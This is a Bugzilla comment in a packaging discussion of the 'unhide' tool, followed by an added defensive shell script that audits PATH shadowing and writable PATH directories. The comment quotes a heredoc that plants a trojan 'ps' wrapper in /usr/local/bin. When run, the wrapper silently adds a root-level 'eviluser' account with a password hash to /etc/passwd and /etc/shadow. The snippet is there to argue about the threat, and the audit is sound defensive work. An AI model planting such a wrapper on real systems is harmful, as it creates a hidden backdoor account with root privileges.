https://bugzilla.redhat.com/show_bug.cgi?id=469843

--- Comment #6 from Till Maas <opensource@xxxxxxxxx> 2008-12-08 15:21:54 EDT ---
(In reply to comment #5)
> To be honest, I would not run this "security application" on my system. I am
> afraid of something along
>
> cat >> /usr/local/bin/ps << EOF
> #! /bin/bash
> echo "eviluser:x:0:0:root:/root:/bin/bash" >> /etc/passwd
> echo "eviluser:$1$FvAHRp.t$nuD9eJQjgdgE7aXBNfBM/1:13805:0:99999:7:::" >> /etc/shadow
> /bin/ps $*
> EOF

/usr/local/bin is only writable by root and how does not packaging unhide
prevent you from this attack? Or do you never use ps without an absolute path
as root? Nevertheless, the attacker could also do this for any binary on the
system, not only ps.
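Added example, not part of the original comment or of unhide: a POSIX sh audit for the wrapper scenario discussed above. It lists command names that an earlier PATH directory hides from a later one, and PATH directories that someone other than the expected owner can write to. The function names and the optional owner argument are assumptions made for this example.

```shell
#!/bin/sh
# Added example: audit a PATH string for the shadowing that a planted
# wrapper such as the quoted /usr/local/bin/ps relies on.

# shadowed_commands PATHSTRING
# Prints "name<TAB>winner<TAB>hidden" when an executable in an earlier
# directory hides a different file of the same name in a later one.
shadowed_commands() (
    earlier=
    IFS=:
    for dir in $1; do
        [ -n "$dir" ] || dir=.      # empty PATH entry = current directory
        for file in "$dir"/*; do
            [ -f "$file" ] && [ -x "$file" ] || continue
            name=${file##*/}
            for prev in $earlier; do
                cand=$prev/$name
                [ -f "$cand" ] && [ -x "$cand" ] || continue
                # Same file via a symlinked directory (/bin -> /usr/bin) is not shadowing.
                [ "$cand" -ef "$file" ] || printf '%s\t%s\t%s\n' "$name" "$cand" "$file"
                break
            done
        done
        earlier=${earlier:+$earlier:}$dir
    done
)

# unsafe_path_dirs PATHSTRING [OWNER]
# Prints each PATH directory that is group- or world-writable, or not owned
# by OWNER (default root, an assumption matching the comment's premise).
unsafe_path_dirs() (
    owner=${2:-root}
    IFS=:
    for dir in $1; do
        [ -n "$dir" ] || dir=.
        [ -d "$dir" ] || continue
        find -H "$dir" -prune \( -perm -002 -o -perm -020 -o ! -user "$owner" \) -print
    done
)
```

Run as root with `shadowed_commands "$PATH"` and `unsafe_path_dirs "$PATH"`; each reported pair shows which file a bare command name resolves to and which file it hides.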